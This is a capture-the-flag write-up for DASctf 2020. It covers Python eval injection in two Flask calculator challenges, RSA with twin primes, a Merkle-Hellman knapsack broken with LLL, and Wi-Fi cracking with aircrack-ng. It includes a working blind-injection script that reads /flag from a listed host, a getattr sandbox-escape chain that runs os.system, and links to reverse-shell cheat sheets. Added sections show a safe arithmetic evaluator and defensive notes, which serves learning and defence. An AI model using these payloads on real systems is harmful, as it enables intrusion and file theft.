DASctf-2020-6

Reflecting on life once a day; PHP still has to be learned.

0x01 web

1. Calculator-1

Source:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request, session
from config import black_list, create   # config.py (not shown) supplies the blacklist and the question generator
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)
## flag is in /flag try to get it
@app.route('/', methods=['GET', 'POST'])
def index():
    def filter(string):
        # reject any input that contains a blacklisted substring
        for black_word in black_list:
            if black_word in string:
                return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()
        input_question = session.get('question')
        session['question'] = create_question
        if input_question == None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)
        if filter(input) == "hack":
            return render_template('index.html', answer="hack", question=create_question)
        try:
            # the vulnerable call: the user-supplied string is evaluated as Python
            calc_result = str((eval(input_question + "=" + str(input))))
            if calc_result == 'True':
                result = "Congratulations"
            elif calc_result == 'False':
                result = "Error"
            else:
                result = "Invalid"
        except:
            result = "Invalid"
        return render_template('index.html', answer=result, question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html', question=create_question)

@app.route('/source')
def source():
    return open("app.py", "r").read()

if __name__ == '__main__':
    app.run(host="0.0.0.0", debug=False)

In short: eval runs the input string and returns the result, and the comment tells us the flag is in /flag.

try: calc_result = str((eval(input_question + "=" + str(input))))

This can be exploited as a Python boolean blind injection: read the flag file, try one character at a time, and judge each guess from the response.

import requests
import re
from urllib.parse import quote as urlencode

def main():
    # candidate characters for each flag position
    alphabet = ['{','}', '@', '_',',','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
    proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}   # local proxy for inspecting the traffic
    data = {"input": ""}
    s = requests.Session()   # keep the session cookie so the server-side question matches ours

    flag = ''
    for i in range(0, 100):
        for char in alphabet:
            try:
                # fetch a fresh question; the <h4> holds something like "1+2=" and the trailing "=" is stripped
                r = s.post("http://183.129.189.60:10026/", data={"input": ""})
                question = re.search(r"<h4>(.*)</h4>", r.content.decode(), re.M|re.I).group().replace("<h4>", "").replace("</h4>", "")[:-1]
                # answer the question correctly, then AND it with a guess for flag[i]
                data["input"] = "{0} and '{2}'==(open('/flag','r').read()[{1}])".format(question, i, char)
                r = s.post("http://183.129.189.60:10026/", data=data, proxies=proxies)
                result = r.content.decode()
                # "Congratulations" means the whole expression evaluated to True, so the guess was right
                if r"Congratulations" in result:
                    flag += char
                    print(flag)
                    break
            except Exception as e:
                print("Exception: ", end='')
                print(e)

if __name__ == '__main__':
    main()

Things learned: 1) re.M, see http://www.javashuo.com/article/p-ctixjckb-o.html

2) {0} in str.format, self-explanatory

On CTFs: boolean blind injection through Python eval

2. Calculator-2

Source:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from flask import Flask, render_template, request, session
#from config import black_list,create
import os
app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(24)

black_list = ['os', '12']

## flag is in /flag try to get it
@app.route('/', methods=['GET', 'POST'])
def index():
    def filter(string):
        # substring blacklist: 'os' or '12' anywhere in the input is rejected
        for black_word in black_list:
            if black_word in string:
                return "hack"
        return string

    if request.method == 'POST':
        input = request.form['input']
        create_question = create()   # create() comes from config.py, which is not shown
        input_question = session.get('question')
        session['question'] = create_question
        if input_question == None:
            return render_template('index.html', answer="Invalid session please try again!", question=create_question)

        if filter(input) == "hack":
            return render_template('index.html', answer="hack", question=create_question)

        calc_str = input_question + "=" + str(input)
        try:
            calc_result = str((eval(calc_str)))   # the vulnerable eval
        except Exception as ex:
            calc_result = "Invalid"
        return render_template('index.html', answer=calc_result, question=create_question)

    if request.method == 'GET':
        create_question = create()
        session['question'] = create_question
        return render_template('index.html', question=create_question)


@app.route('/source')
def source():
    return open("app.py", "r").read()

if __name__ == '__main__':
    app.run(host="0.0.0.0", debug=False)

Sandbox escape reference: the third method in https://www.freebuf.com/column/232197.html

How the attribute-chain call is constructed: https://www.mi1k7ea.com/2019/05/31/Python%E6%B2%99%E7%AE%B1%E9%80%83%E9%80%B8%E5%B0%8F%E7%BB%93/

Using getattr() to bypass the filter (usually used to get around a filtered '.'):

getattr(getattr(getattr(getattr(getattr(getattr(getattr([],'__cla'+'ss__'),'__mr'+'o__')[1],'__subclas'+'ses__')()[104],'__init__'),'__glob'+'al'+'s__')['sy'+'s'],'mod'+'ules')['o'+'s'],'sy'+'ste'+'m')('l'+'s')

getattr: returns the value of an object's attribute.

It returns the class object, then the class's __mro__, and the rest of the chain is built from there.
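Both calculator challenges share one root cause: user text reaches eval(), and a substring blacklist such as ['os', '12'] cannot stop a payload that rebuilds the forbidden names with getattr() and string concatenation, as the chain above shows. The durable fix is to never evaluate user input as Python at all. The block below is an added example (not the challenge's code and not the author's) of a check_answer() replacement that parses both the question and the submitted answer with the ast module and permits only integer arithmetic, so calls, names, attribute access and subscripts are rejected before anything is computed. It assumes the question string carries the trailing "=" form the exploit script strips ("3+4="); the names check_answer, safe_int_eval and UnsafeExpression are my own.

```python
import ast
import operator

# Only these operators are allowed. Anything else in the syntax tree (calls such as
# open(), names such as getattr, attribute access, subscripts, boolean 'and') is rejected.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


class UnsafeExpression(ValueError):
    """Raised for anything that is not plain integer arithmetic."""


def _eval_node(node):
    # Integer literal (bool is excluded on purpose: type(True) is bool, not int)
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_eval_node(node.left), _eval_node(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_eval_node(node.operand))
    raise UnsafeExpression("disallowed syntax: " + type(node).__name__)


def safe_int_eval(expr, max_len=64):
    """Evaluate a small integer-arithmetic expression without eval()."""
    if len(expr) > max_len:
        raise UnsafeExpression("expression too long")
    try:
        tree = ast.parse(expr, mode="eval")
    except SyntaxError as exc:
        raise UnsafeExpression("not an arithmetic expression") from exc
    return _eval_node(tree.body)


def check_answer(question, answer):
    """Drop-in replacement for eval(question + '=' + answer).

    Both sides are parsed separately, so the submitted answer can never change
    the meaning of the question. Returns the same three strings the challenge uses.
    """
    try:
        expected = safe_int_eval(question.rstrip("="))   # question looks like "3+4="
        given = safe_int_eval(answer)
    except (UnsafeExpression, ZeroDivisionError):
        return "Invalid"
    return "Congratulations" if expected == given else "Error"


if __name__ == "__main__":
    # Constructed inputs: a correct answer, a wrong one, and the two payload shapes from this writeup.
    print(check_answer("3+4=", "7"))
    print(check_answer("3+4=", "8"))
    print(check_answer("3+4=", "3+4 and 'N'==(open('/flag','r').read()[0])"))
    print(check_answer("3+4=", "getattr([],'__cla'+'ss__')"))
```

The blacklist in Calculator-2 is kept out entirely: the allow-list on node types makes the question of which substrings to forbid moot, and the length cap plus the absence of Pow keep the evaluator from being used as a CPU sink.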

Reverse shell

One-liner reverse shell: http://www.javashuo.com/article/p-xnodmndl-cx.html

More detail: https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html

Finally found one with a hands-on lab: http://www.javashuo.com/article/p-ddqlavso-eh.html

Victim side: here 192.168.220.128 is the attacker's IP

Attacker side

(start the listener first)

Reverse shell for this challenge

os.system can execute system commands

As for why other people's PHP calling Python produces output normally while mine shows nothing at all, I haven't found the cause yet:

http://www.javashuo.com/article/p-wehtsfaw-mx.html


Didn't look at the other web challenges....

0x02 Crypto

1. Gemini_Man

Two numbers are given, N and C: RSA with a very large N. There also seems to have been a hint about twin primes (I didn't see it anyway). Guessing q = p + 2, p and q can be recovered.

e was guessed as 65537....

from gmpy2 import *
n = '*******'   # N from the challenge (value elided in the post); use the integer here
c = '*******'   # C from the challenge (value elided in the post); use the integer here
p = iroot(n, 2)[0]   # integer square root of n; for twin primes n = (p+1)^2 - 1, so this is exactly p
q = p + 2
print(p*q == n)      # sanity check that the twin-prime guess holds
phi = (p-1)*(q-1)
e = 65537

print("d.....")
d = invert(e, phi)
print("m.....")

m = int(powmod(c, d, n))
print("flag....")
# hex(m).strip("0xL") would also strip trailing '0' digits, so convert the integer directly
flag = m.to_bytes((m.bit_length() + 7) // 8, 'big')
print(flag)
# b'Nep{e540b1fd7d4459619eecd244c12ae5c4}'
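Why the integer square root lands exactly on p: with q = p + 2, n = p(p + 2) = (p + 1)^2 - 1, so isqrt(n) = p. The block below is an added example (not the writeup's script) in pure Python with constructed twin primes standing in for the elided challenge numbers; it also goes beyond the twin-prime case with Fermat's method, which recovers any p, q that are close together, the twin-prime case being its very first iteration. The names twin_prime_split, fermat_factor and rsa_decrypt_bytes are my own.

```python
from math import isqrt

E = 65537

# Constructed example: 10**9+7 and 10**9+9 are twin primes (not the challenge's N).
P_DEMO, Q_DEMO = 1000000007, 1000000009
N_DEMO = P_DEMO * Q_DEMO   # 1000000016000000063


def twin_prime_split(n):
    """The writeup's trick: if q = p + 2 then n = (p+1)^2 - 1, so isqrt(n) == p.
    Returns (p, q) when the guess checks out, otherwise None."""
    p = isqrt(n)
    q = p + 2
    return (p, q) if p * q == n else None


def fermat_factor(n, max_steps=10000):
    """Generalisation: Fermat's method factors n = p*q whenever |p - q| is small.
    Walk a = ceil(sqrt(n)), ceil(sqrt(n))+1, ... until a^2 - n is a perfect square b^2;
    then n = (a-b)(a+b). Twin primes succeed at the first a."""
    a = isqrt(n)
    if a * a < n:
        a += 1
    for _ in range(max_steps):
        b2 = a * a - n
        b = isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1
    return None   # primes too far apart for this many steps


def rsa_decrypt_bytes(n, c, e=E):
    """Recover the plaintext bytes from (n, c) once the close primes are known."""
    p, q = fermat_factor(n)
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # modular inverse (Python 3.8+)
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    msg = b"twin"                                    # constructed plaintext; must be < N_DEMO
    c = pow(int.from_bytes(msg, "big"), E, N_DEMO)
    print(twin_prime_split(N_DEMO))
    print(fermat_factor(N_DEMO))
    print(rsa_decrypt_bytes(N_DEMO, c))
```

The defensive reading is the usual one: key generation must draw p and q independently so that |p - q| is on the order of sqrt(n), because anything much closer falls to the few lines above regardless of key size.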

2. HardKnapsack1

import hashlib
a0 = 780007910488861179164293870887
a1 = 644757781267431438527370588084
a2 = 886344987910700007796700699622
a3 = 67037192443258799119898868140
a4 = 315956500273241342245431683326
a5 = 351211073412604835884630475291
a6 = 335995606663513190145190482978
a7 = 297359033781432237886700807123
a8 = 830856741522978372146275766502
a9 = 66237663505632806581378309121
a10 = 215381734735218549313962033405
a11 = 901490788983193928886516147592
a12 = 499548714837069155558450537001
a13 = 224630055332830997824601426897
a14 = 919172894051797483753355195026
a15 = 1245440331898780823251731300504
a16 = 298263995223321209902868895182
a17 = 736591430769582414355553278342
a18 = 1217976030016671115168136964102
a19 = 980399099884318297365025522271
a20 = 726084355132965753252062504988
a21 = 951277826840378766945561669930
a22 = 7492442200302555390486229208
a23 = 769018513342604618159516970070
a24 = 968152198590814209754881322238
a25 = 1175154665753017160833066426121
a26 = 451952196471082603080565175017
a27 = 1221094023689255701171287330816
a28 = 617456087916724185254283878151
a29 = 226112898226641715564773252737
a30 = 494810212661607333752928148148
a31 = 1244821663551343141356670958981
a32 = 679214190369761834097630749359
a33 = 745058412645059179660418453044
a34 = 1178229830813633913730449092984
a35 = 145802775498878544007250617349
a36 = 1120246265160574187528207432153
a37 = 879947206559082641568587869322
a38 = 694829766294593284811782637743
a39 = 27254432667363032997310672464
a40 = 659494232598071549477042457760
a41 = 246528894190618505904569471972
a42 = 678865008088637501445062252585
a43 = 338808883115188328216917974008

s = 7435339872422467409289909942435

from flag import FLAG, m
alist = []
for i in range(44):
    eval("alist.append({})".format('a' + str(i)))
ss = 0
for i in range(len(m)):
    assert (int(m[i]) == 1 or int(m[i]) == 0)
    ss += alist[i] * int(m[i])
assert(ss == s)

assert(hashlib.md5(m.encode()).hexdigest() == FLAG)

So m is a 44-element list of 0s and 1s; for every 1 the corresponding a[i] is added, and we are given the resulting sum and the a list. Recover m and you get the flag. Next time I should search the challenge name first instead of trusting my own ideas.

Knapsack encryption: https://lazzzaro.github.io/2020/05/13/crypto-%E5%85%B6%E4%BB%96%E5%8A%A0%E5%AF%86%E7%AE%97%E6%B3%95/#Merkle-Hellman%E8%83%8C%E5%8C%85%E5%8A%A0%E5%AF%86

LLL algorithm: the one used to break knapsack ciphers (the code couldn't be used directly?)

from hashlib import *
from sage.all import *   # run under SageMath: identity_matrix, block_matrix and LLL come from Sage
a = [780007910488861179164293870887, 644757781267431438527370588084, 886344987910700007796700699622, 67037192443258799119898868140, 315956500273241342245431683326, 351211073412604835884630475291, 335995606663513190145190482978, 297359033781432237886700807123, 830856741522978372146275766502, 66237663505632806581378309121, 215381734735218549313962033405, 901490788983193928886516147592, 499548714837069155558450537001, 224630055332830997824601426897, 919172894051797483753355195026, 1245440331898780823251731300504, 298263995223321209902868895182, 736591430769582414355553278342, 1217976030016671115168136964102, 980399099884318297365025522271, 726084355132965753252062504988, 951277826840378766945561669930, 7492442200302555390486229208, 769018513342604618159516970070, 968152198590814209754881322238, 1175154665753017160833066426121, 451952196471082603080565175017, 1221094023689255701171287330816, 617456087916724185254283878151, 226112898226641715564773252737, 494810212661607333752928148148, 1244821663551343141356670958981, 679214190369761834097630749359, 745058412645059179660418453044, 1178229830813633913730449092984, 145802775498878544007250617349, 1120246265160574187528207432153, 879947206559082641568587869322, 694829766294593284811782637743, 27254432667363032997310672464, 659494232598071549477042457760, 246528894190618505904569471972, 678865008088637501445062252585, 338808883115188328216917974008]
s = 7435339872422467409289909942435
def decrypt(enc, publickey):
    # dimension
    n = len(publickey)
    # build the lattice basis: rows [2I | a] on top, [1 ... 1 | s] as the last row
    d = 2*identity_matrix(ZZ, n, n)
    col = publickey + [enc]
    col = matrix(col).transpose()
    last = matrix(ZZ, [[1]*n])
    tmp = block_matrix(ZZ, [[d], [last]])
    grid = block_matrix(ZZ, [[tmp, col]])
    # lattice reduction with LLL to find the shortest vector
    M = grid.LLL()
    # recover the message from the shortest vector; there are two possibilities (the vector or
    # its negation). Only the second is handled here; the commented-out lines give the first.
    m = ''
    for i in M[0]:
        if i == -1:
#             m += '0'
            m += '1'
        elif i == 1:
#             m += '1'
            m += '0'
    return m

m = decrypt(s, a)
# m = '01100101000000000100010010000010000100100111'
flag = md5(m.encode()).hexdigest()
print(flag)
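To see why the reduced vector decodes the way decrypt() does, and why it can come out with either sign, here is an added example (not the writeup's script, and needing no Sage) that builds the same lattice rows [2I | a] and [1 ... 1 | s] in plain Python for a constructed 8-element instance. It shows that sum(x_i * row_i) minus the last row is exactly the (±1, ..., ±1, 0) vector LLL is hunting for, and its decode() resolves the sign ambiguity by checking which reading reproduces s; the writeup's mapping -1 -> '1', 1 -> '0' is the negated reading. The names build_lattice, combine, target_vector and decode are my own.

```python
# Constructed toy instance (not the challenge numbers): public weights and the secret bits.
A = [23, 47, 61, 89, 113, 137, 163, 191]
X = [1, 0, 1, 1, 0, 0, 1, 0]
S = sum(a * x for a, x in zip(A, X))   # subset sum handed to the attacker: 336


def build_lattice(pub, target):
    """Rows of the basis used by decrypt(): row i = (0..2..0 | a_i), last row = (1..1 | s)."""
    n = len(pub)
    rows = []
    for i in range(n):
        row = [0] * n
        row[i] = 2
        rows.append(row + [pub[i]])
    rows.append([1] * n + [target])
    return rows


def combine(rows, coeffs):
    """Integer linear combination of basis rows (a lattice point)."""
    dim = len(rows[0])
    v = [0] * dim
    for c, r in zip(coeffs, rows):
        for j in range(dim):
            v[j] += c * r[j]
    return v


def target_vector(rows, bits):
    """sum(x_i * row_i) - last row: entry i is 2*x_i - 1, the last entry is sum(x_i a_i) - s."""
    return combine(rows, list(bits) + [-1])


def decode(vec, pub, target):
    """Map a (+-1, ..., +-1, 0) vector back to bits.

    Both the vector and its negation are lattice points of the same length, so LLL may
    return either; try both readings and keep the one whose subset sum equals the target.
    """
    body, last = vec[:-1], vec[-1]
    if last != 0 or any(abs(v) != 1 for v in body):
        return None
    for sign in (1, -1):
        bits = [1 if sign * v == 1 else 0 for v in body]
        if sum(a * b for a, b in zip(pub, bits)) == target:
            return bits
    return None


if __name__ == "__main__":
    rows = build_lattice(A, S)
    v = target_vector(rows, X)
    print(v)                                  # [1, -1, 1, 1, -1, -1, 1, -1, 0]
    print(decode(v, A, S))                    # X
    print(decode([-c for c in v], A, S))      # X again, via the negated reading
```

A (2x_i - 1) encoding is used rather than x_i itself so that a 0 bit and a 1 bit contribute the same length to the short vector; that symmetry is what makes the target vector the shortest thing in the lattice for a low-density instance like the challenge's.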


0x03 MISC

Let me summarize the tools; I didn't even download the file for the challenge that felt highest in quality.

1) aircrack-ng

For cracking Wi-Fi passwords. A capture file is given: aircrack-ng *.cap reveals the Wi-Fi ESSID, then aircrack-ng *.cap -w password.txt (the txt is the wordlist for brute forcing; one can be found on GitHub) brute-forces the password, and finally airdecap-ng *.cap -e ESSID -p pwd yields the decrypted original packets.

Then analyze in Wireshark: filter on the HTTP protocol and inspect; for carving the files inside, see: https://blog.csdn.net/xiaopan233/article/details/89765018

After analysis there is a blank txt: SNOW steganography....

2) Memory forensics with Volatility, which deserves its own post

http://www.javashuo.com/article/p-bbfvtfne-dt.html

3) zsteg

Can detect steganographic data hidden in PNG and BMP images

4) Invisible watermark tools

Worth looking up and trying for image steganography

0x04 Summary
